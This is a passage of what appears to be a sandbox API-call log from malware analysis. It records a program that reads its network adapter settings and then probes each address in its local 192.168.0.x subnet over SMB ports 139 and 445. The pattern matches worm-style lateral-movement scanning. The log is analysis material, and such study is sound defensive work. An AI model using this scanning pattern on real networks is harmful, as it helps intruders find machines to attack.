type=1, protocol=6) returned 0x6c0 [0225.167] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0225.167] htons (hostshort=0x8b) returned 0x8b00 [0225.167] ioctlsocket (in: s=0x6c0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0225.167] connect (s=0x6c0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.103"), namelen=16) returned -1 [0225.167] ioctlsocket (in: s=0x6c0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0225.167] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0226.179] __WSAFDIsSet (param_1=0x6c0, param_2=0x346f960) returned 0 [0226.179] GetLastError () returned 0x0 [0226.179] SetLastError (dwErrCode=0x0) [0226.179] GetLastError () returned 0x0 [0226.179] SetLastError (dwErrCode=0x0) [0226.180] htonl (hostlong=0xc0a80068) returned 0x6800a8c0 [0226.180] inet_ntoa (in=0x6800a8c0) returned="192.168.0.104" [0226.180] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0226.180] socket (af=2, type=1, protocol=6) returned 0x588 [0226.180] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0226.180] htons (hostshort=0x8b) returned 0x8b00 [0226.180] ioctlsocket (in: s=0x588, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0226.180] connect (s=0x588, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.104"), namelen=16) returned -1 [0226.180] ioctlsocket (in: s=0x588, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0226.181] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0227.194] __WSAFDIsSet (param_1=0x588, param_2=0x346f960) returned 0 [0227.194] GetLastError () returned 0x0 [0227.194] SetLastError (dwErrCode=0x0) [0227.194] GetLastError () returned 0x0 [0227.194] SetLastError (dwErrCode=0x0) [0227.194] htonl (hostlong=0xc0a80069) returned 0x6900a8c0 [0227.194] inet_ntoa (in=0x6900a8c0) returned="192.168.0.105" [0227.194] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0227.194] socket (af=2, type=1, protocol=6) returned 0x6cc [0227.194] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0227.194] htons (hostshort=0x8b) returned 0x8b00 [0227.194] ioctlsocket (in: s=0x6cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0227.195] connect (s=0x6cc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.105"), namelen=16) returned -1 [0227.195] ioctlsocket (in: s=0x6cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0227.195] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0228.207] __WSAFDIsSet (param_1=0x6cc, param_2=0x346f960) returned 0 [0228.207] GetLastError () returned 0x0 [0228.207] SetLastError (dwErrCode=0x0) [0228.208] GetLastError () returned 0x0 [0228.208] SetLastError (dwErrCode=0x0) [0228.208] htonl (hostlong=0xc0a8006a) returned 0x6a00a8c0 [0228.208] inet_ntoa (in=0x6a00a8c0) returned="192.168.0.106" [0228.208] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0228.208] socket (af=2, type=1, protocol=6) returned 0x6d8 [0228.208] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0228.208] htons (hostshort=0x8b) returned 0x8b00 [0228.208] ioctlsocket (in: s=0x6d8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0228.208] connect (s=0x6d8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.106"), namelen=16) returned -1 [0228.208] ioctlsocket (in: s=0x6d8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0228.208] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0229.222] __WSAFDIsSet (param_1=0x6d8, param_2=0x346f960) returned 0 [0229.222] GetLastError () returned 0x0 [0229.222] SetLastError (dwErrCode=0x0) [0229.222] GetLastError () returned 0x0 [0229.222] SetLastError (dwErrCode=0x0) [0229.222] htonl (hostlong=0xc0a8006b) returned 0x6b00a8c0 [0229.222] inet_ntoa (in=0x6b00a8c0) returned="192.168.0.107" [0229.222] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0229.222] socket (af=2, type=1, protocol=6) returned 0x6e4 [0229.223] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0229.223] htons (hostshort=0x8b) returned 0x8b00 [0229.223] ioctlsocket (in: s=0x6e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0229.223] connect (s=0x6e4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.107"), namelen=16) returned -1 [0229.223] ioctlsocket (in: s=0x6e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0229.223] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0230.235] __WSAFDIsSet (param_1=0x6e4, param_2=0x346f960) returned 0 [0230.235] GetLastError () returned 0x0 [0230.235] SetLastError (dwErrCode=0x0) [0230.235] GetLastError () returned 0x0 [0230.235] SetLastError (dwErrCode=0x0) [0230.235] htonl (hostlong=0xc0a8006c) returned 0x6c00a8c0 [0230.235] inet_ntoa (in=0x6c00a8c0) returned="192.168.0.108" [0230.236] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0230.236] socket (af=2, type=1, protocol=6) returned 0x6e8 [0230.236] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0230.236] htons (hostshort=0x8b) returned 0x8b00 [0230.236] ioctlsocket (in: s=0x6e8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0230.236] connect (s=0x6e8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.108"), namelen=16) returned -1 [0230.236] ioctlsocket (in: s=0x6e8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0230.237] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0231.251] __WSAFDIsSet (param_1=0x6e8, param_2=0x346f960) returned 0 [0231.251] GetLastError () returned 0x0 [0231.251] SetLastError (dwErrCode=0x0) [0231.251] GetLastError () returned 0x0 [0231.251] SetLastError (dwErrCode=0x0) [0231.251] htonl (hostlong=0xc0a8006d) returned 0x6d00a8c0 [0231.251] inet_ntoa (in=0x6d00a8c0) returned="192.168.0.109" [0231.251] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0231.251] socket (af=2, type=1, protocol=6) returned 0x6f4 [0231.251] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0231.251] htons (hostshort=0x8b) returned 0x8b00 [0231.252] ioctlsocket (in: s=0x6f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0231.252] connect (s=0x6f4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.109"), namelen=16) returned -1 [0231.252] ioctlsocket (in: s=0x6f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0231.252] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0232.263] __WSAFDIsSet (param_1=0x6f4, param_2=0x346f960) returned 0 [0232.263] GetLastError () returned 0x0 [0232.263] SetLastError (dwErrCode=0x0) [0232.263] GetLastError () returned 0x0 [0232.263] SetLastError (dwErrCode=0x0) [0232.263] htonl (hostlong=0xc0a8006e) returned 0x6e00a8c0 [0232.263] inet_ntoa (in=0x6e00a8c0) returned="192.168.0.110" [0232.263] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0232.263] socket (af=2, type=1, protocol=6) returned 0x6f8 [0232.264] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0232.264] htons (hostshort=0x8b) returned 0x8b00 [0232.264] ioctlsocket (in: s=0x6f8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0232.264] connect (s=0x6f8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.110"), namelen=16) returned -1 [0232.264] ioctlsocket (in: s=0x6f8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0232.264] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0233.279] __WSAFDIsSet (param_1=0x6f8, param_2=0x346f960) returned 0 [0233.279] GetLastError () returned 0x0 [0233.279] SetLastError (dwErrCode=0x0) [0233.279] GetLastError () returned 0x0 [0233.279] SetLastError (dwErrCode=0x0) [0233.279] htonl (hostlong=0xc0a8006f) returned 0x6f00a8c0 [0233.279] inet_ntoa (in=0x6f00a8c0) returned="192.168.0.111" [0233.279] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0233.279] socket (af=2, type=1, protocol=6) returned 0x704 [0233.280] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0233.280] htons (hostshort=0x8b) returned 0x8b00 [0233.280] ioctlsocket (in: s=0x704, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0233.280] connect (s=0x704, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.111"), namelen=16) returned -1 [0233.280] ioctlsocket (in: s=0x704, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0233.280] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0234.292] __WSAFDIsSet (param_1=0x704, param_2=0x346f960) returned 0 [0234.292] GetLastError () returned 0x0 [0234.292] SetLastError (dwErrCode=0x0) [0234.293] GetLastError () returned 0x0 [0234.293] SetLastError (dwErrCode=0x0) [0234.293] htonl (hostlong=0xc0a80070) returned 0x7000a8c0 [0234.293] inet_ntoa (in=0x7000a8c0) returned="192.168.0.112" [0234.293] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0234.293] socket (af=2, type=1, protocol=6) returned 0x708 [0234.293] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0234.293] htons (hostshort=0x8b) returned 0x8b00 [0234.293] ioctlsocket (in: s=0x708, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0234.293] connect (s=0x708, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.112"), namelen=16) returned -1 [0234.294] ioctlsocket (in: s=0x708, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0234.294] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0235.307] __WSAFDIsSet (param_1=0x708, param_2=0x346f960) returned 0 [0235.307] GetLastError () returned 0x0 [0235.307] SetLastError (dwErrCode=0x0) [0235.307] GetLastError () returned 0x0 [0235.307] SetLastError (dwErrCode=0x0) [0235.307] htonl (hostlong=0xc0a80071) returned 0x7100a8c0 [0235.307] inet_ntoa (in=0x7100a8c0) returned="192.168.0.113" [0235.307] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0235.307] socket (af=2, type=1, protocol=6) returned 0x714 [0235.308] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0235.308] htons (hostshort=0x8b) returned 0x8b00 [0235.308] ioctlsocket (in: s=0x714, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0235.308] connect (s=0x714, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.113"), namelen=16) returned -1 [0235.308] ioctlsocket (in: s=0x714, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0235.308] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0236.320] __WSAFDIsSet (param_1=0x714, param_2=0x346f960) returned 0 [0236.320] GetLastError () returned 0x0 [0236.320] SetLastError (dwErrCode=0x0) [0236.320] GetLastError () returned 0x0 [0236.320] SetLastError (dwErrCode=0x0) [0236.320] htonl (hostlong=0xc0a80072) returned 0x7200a8c0 [0236.320] inet_ntoa (in=0x7200a8c0) returned="192.168.0.114" [0236.320] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0236.321] socket (af=2, type=1, protocol=6) returned 0x718 [0236.321] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0236.321] htons (hostshort=0x8b) returned 0x8b00 [0236.321] ioctlsocket (in: s=0x718, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0236.321] connect (s=0x718, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.114"), namelen=16) returned -1 [0236.322] ioctlsocket (in: s=0x718, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0236.322] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0237.335] __WSAFDIsSet (param_1=0x718, param_2=0x346f960) returned 0 [0237.335] GetLastError () returned 0x0 [0237.335] SetLastError (dwErrCode=0x0) [0237.335] GetLastError () returned 0x0 [0237.335] SetLastError (dwErrCode=0x0) [0237.335] htonl (hostlong=0xc0a80073) returned 0x7300a8c0 [0237.335] inet_ntoa (in=0x7300a8c0) returned="192.168.0.115" [0237.335] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0237.335] socket (af=2, type=1, protocol=6) returned 0x724 [0237.336] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0237.336] htons (hostshort=0x8b) returned 0x8b00 [0237.336] ioctlsocket (in: s=0x724, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0237.336] connect (s=0x724, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.115"), namelen=16) returned -1 [0237.336] ioctlsocket (in: s=0x724, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0237.336] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0238.347] __WSAFDIsSet (param_1=0x724, param_2=0x346f960) returned 0 [0238.347] GetLastError () returned 0x0 [0238.347] SetLastError (dwErrCode=0x0) [0238.347] GetLastError () returned 0x0 [0238.347] SetLastError (dwErrCode=0x0) [0238.348] htonl (hostlong=0xc0a80074) returned 0x7400a8c0 [0238.348] inet_ntoa (in=0x7400a8c0) returned="192.168.0.116" [0238.348] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0238.348] socket (af=2, type=1, protocol=6) returned 0x728 [0238.348] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0238.348] htons (hostshort=0x8b) returned 0x8b00 [0238.348] ioctlsocket (in: s=0x728, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0238.348] connect (s=0x728, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.116"), namelen=16) returned -1 [0238.349] ioctlsocket (in: s=0x728, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0238.349] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0239.426] __WSAFDIsSet (param_1=0x728, param_2=0x346f960) returned 0 [0239.426] GetLastError () returned 0x0 [0239.426] SetLastError (dwErrCode=0x0) [0239.426] GetLastError () returned 0x0 [0239.426] SetLastError (dwErrCode=0x0) [0239.426] htonl (hostlong=0xc0a80075) returned 0x7500a8c0 [0239.426] inet_ntoa (in=0x7500a8c0) returned="192.168.0.117" [0239.426] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0239.426] socket (af=2, type=1, protocol=6) returned 0x734 [0239.426] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0239.426] htons (hostshort=0x8b) returned 0x8b00 [0239.426] ioctlsocket (in: s=0x734, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0239.427] connect (s=0x734, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.117"), namelen=16) returned -1 [0239.427] ioctlsocket (in: s=0x734, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0239.427] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0240.438] __WSAFDIsSet (param_1=0x734, param_2=0x346f960) returned 0 [0240.438] GetLastError () returned 0x0 [0240.438] SetLastError (dwErrCode=0x0) [0240.438] GetLastError () returned 0x0 [0240.438] SetLastError (dwErrCode=0x0) [0240.438] htonl (hostlong=0xc0a80076) returned 0x7600a8c0 [0240.438] inet_ntoa (in=0x7600a8c0) returned="192.168.0.118" [0240.439] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0240.439] socket (af=2, type=1, protocol=6) returned 0x738 [0240.439] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0240.439] htons (hostshort=0x8b) returned 0x8b00 [0240.439] ioctlsocket (in: s=0x738, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0240.439] connect (s=0x738, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.118"), namelen=16) returned -1 [0240.440] ioctlsocket (in: s=0x738, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0240.440] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0241.454] __WSAFDIsSet (param_1=0x738, param_2=0x346f960) returned 0 [0241.454] GetLastError () returned 0x0 [0241.454] SetLastError (dwErrCode=0x0) [0241.454] GetLastError () returned 0x0 [0241.454] SetLastError (dwErrCode=0x0) [0241.454] htonl (hostlong=0xc0a80077) returned 0x7700a8c0 [0241.454] inet_ntoa (in=0x7700a8c0) returned="192.168.0.119" [0241.454] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0241.454] socket (af=2, type=1, protocol=6) returned 0x744 [0241.454] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0241.454] htons (hostshort=0x8b) returned 0x8b00 [0241.454] ioctlsocket (in: s=0x744, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0241.454] connect (s=0x744, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.119"), namelen=16) returned -1 [0241.454] ioctlsocket (in: s=0x744, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0241.455] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0242.466] __WSAFDIsSet (param_1=0x744, param_2=0x346f960) returned 0 [0242.466] GetLastError () returned 0x0 [0242.466] SetLastError (dwErrCode=0x0) [0242.466] GetLastError () returned 0x0 [0242.466] SetLastError (dwErrCode=0x0) [0242.466] htonl (hostlong=0xc0a80078) returned 0x7800a8c0 [0242.466] inet_ntoa (in=0x7800a8c0) returned="192.168.0.120" [0242.466] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0242.466] socket (af=2, type=1, protocol=6) returned 0x748 [0242.466] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0242.466] htons (hostshort=0x8b) returned 0x8b00 [0242.466] ioctlsocket (in: s=0x748, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0242.466] connect (s=0x748, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.120"), namelen=16) returned -1 [0242.467] ioctlsocket (in: s=0x748, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0242.467] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0243.482] __WSAFDIsSet (param_1=0x748, param_2=0x346f960) returned 0 [0243.482] GetLastError () returned 0x0 [0243.482] SetLastError (dwErrCode=0x0) [0243.482] GetLastError () returned 0x0 [0243.482] SetLastError (dwErrCode=0x0) [0243.482] htonl (hostlong=0xc0a80079) returned 0x7900a8c0 [0243.482] inet_ntoa (in=0x7900a8c0) returned="192.168.0.121" [0243.482] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0243.482] socket (af=2, type=1, protocol=6) returned 0x754 [0243.482] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0243.482] htons (hostshort=0x8b) returned 0x8b00 [0243.482] ioctlsocket (in: s=0x754, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0243.482] connect (s=0x754, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.121"), namelen=16) returned -1 [0243.483] ioctlsocket (in: s=0x754, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0243.483] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0244.494] __WSAFDIsSet (param_1=0x754, param_2=0x346f960) returned 0 [0244.494] GetLastError () returned 0x0 [0244.494] SetLastError (dwErrCode=0x0) [0244.494] GetLastError () returned 0x0 [0244.494] SetLastError (dwErrCode=0x0) [0244.494] htonl (hostlong=0xc0a8007a) returned 0x7a00a8c0 [0244.494] inet_ntoa (in=0x7a00a8c0) returned="192.168.0.122" [0244.495] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0244.495] socket (af=2, type=1, protocol=6) returned 0x758 [0244.495] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0244.495] htons (hostshort=0x8b) returned 0x8b00 [0244.496] ioctlsocket (in: s=0x758, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0244.496] connect (s=0x758, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.122"), namelen=16) returned -1 [0244.497] ioctlsocket (in: s=0x758, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0244.497] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0245.510] __WSAFDIsSet (param_1=0x758, param_2=0x346f960) returned 0 [0245.510] GetLastError () returned 0x0 [0245.510] SetLastError (dwErrCode=0x0) [0245.510] GetLastError () returned 0x0 [0245.510] SetLastError (dwErrCode=0x0) [0245.510] htonl (hostlong=0xc0a8007b) returned 0x7b00a8c0 [0245.510] inet_ntoa (in=0x7b00a8c0) returned="192.168.0.123" [0245.510] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0245.510] socket (af=2, type=1, protocol=6) returned 0x764 [0245.510] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0245.510] htons (hostshort=0x8b) returned 0x8b00 [0245.510] ioctlsocket (in: s=0x764, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0245.510] connect (s=0x764, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.123"), namelen=16) returned -1 [0245.511] ioctlsocket (in: s=0x764, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0245.511] select (nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948) Thread: id = 122 os_tid = 0x840 Thread: id = 123 os_tid = 0x83c [0119.780] GetLastError () returned 0x54f [0119.780] SetLastError (dwErrCode=0x54f) [0119.780] GetCurrentThreadId () returned 0x83c [0119.780] GetCurrentThreadId () returned 0x83c [0119.780] RtlWakeConditionVariable () returned 0x1 [0119.780] GetAdaptersInfo (in: AdapterInfo=0x283c028, SizePointer=0x36ef768 | out: AdapterInfo=0x283c028, SizePointer=0x36ef768) returned 0x0 [0119.821] GetAdaptersInfo (in: AdapterInfo=0x283c028, SizePointer=0x36ef768 | out: AdapterInfo=0x283c028, SizePointer=0x36ef768) returned 0x0 [0119.823] inet_pton (in: Family=2, pszAddrString="192.168.0.39", pAddrBuf=0x36ef76c | out: pAddrBuf=0x36ef76c) returned 1 [0119.823] inet_pton (in: Family=2, pszAddrString="255.255.255.0", pAddrBuf=0x36ef770 | out: pAddrBuf=0x36ef770) returned 1 [0119.823] htonl (hostlong=0xa8c0) returned 0xc0a80000 [0119.823] htonl (hostlong=0xff00a8c0) returned 0xc0a800ff [0119.823] htonl (hostlong=0xc0a80000) returned 0xa8c0 [0119.823] inet_ntoa (in=0xa8c0) returned="192.168.0.0" [0119.823] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0119.823] socket (af=2, type=1, protocol=6) returned 0x380 [0119.823] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0119.823] htons (hostshort=0x1bd) returned 0xbd01 [0119.823] ioctlsocket (in: s=0x380, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0119.823] connect (s=0x380, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.0"), namelen=16) returned -1 [0119.823] ioctlsocket (in: s=0x380, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0119.823] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0120.832] __WSAFDIsSet (param_1=0x380, param_2=0x36ef368) returned 0 [0120.832] GetLastError () returned 0x0 [0120.832] SetLastError (dwErrCode=0x0) [0120.832] GetLastError () returned 0x0 [0120.832] SetLastError (dwErrCode=0x0) [0120.832] htonl (hostlong=0xc0a80001) returned 0x100a8c0 [0120.832] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0120.833] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0120.833] socket (af=2, type=1, protocol=6) returned 0x344 [0120.833] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0120.833] htons (hostshort=0x1bd) returned 0xbd01 [0120.833] ioctlsocket (in: s=0x344, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0120.833] connect (s=0x344, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0120.835] ioctlsocket (in: s=0x344, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0120.835] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0121.846] __WSAFDIsSet (param_1=0x344, param_2=0x36ef368) returned 0 [0121.846] GetLastError () returned 0x0 [0121.846] SetLastError (dwErrCode=0x0) [0121.846] GetLastError () returned 0x0 [0121.846] SetLastError (dwErrCode=0x0) [0121.847] htonl (hostlong=0xc0a80002) returned 0x200a8c0 [0121.847] inet_ntoa (in=0x200a8c0) returned="192.168.0.2" [0121.847] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0121.847] socket (af=2, type=1, protocol=6) returned 0x390 [0121.847] 